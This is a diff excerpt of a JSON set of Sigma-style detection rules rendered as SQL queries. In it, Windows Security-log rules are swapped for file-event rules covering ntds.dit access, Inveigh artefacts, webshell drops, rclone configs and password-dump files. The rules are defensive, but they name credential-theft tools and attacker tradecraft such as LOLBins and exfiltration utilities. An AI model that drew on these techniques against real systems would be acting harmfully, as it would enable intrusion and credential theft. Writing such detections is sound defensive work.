"falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via 
dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign 
of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = 
'5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND 
TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", 
- "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": 
"Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine 
Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on 
Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + 
"filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful 
exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR 
TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": 
